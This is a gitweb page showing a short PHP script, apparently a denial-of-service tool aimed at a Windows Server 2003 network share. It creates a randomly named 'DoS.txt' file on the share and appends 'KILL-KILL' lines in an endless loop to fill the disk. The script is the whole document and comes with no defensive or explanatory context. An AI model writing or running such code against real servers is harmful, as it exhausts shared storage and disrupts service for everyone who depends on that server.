docs
[mirrors/Programs.git] / php / MS_W_Server2003.php
1 <?php
2 $path = "\\\\winserver2003\\profily\\profilek";
3 $file = "DoS.txt".rand(1,999999);
4
5 while(1) {
6
7 $fp = fopen("$path\\$file", "a") or die("Cannot fopen!!!\n");
8 echo("fopen\n");
9 while(!feof($fp)) {
10 fwrite($fp, "KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL-KILL\r\n");
11 }
12 fclose($fp);
13
14 }
This page took 0.26472 seconds and 4 git commands to generate.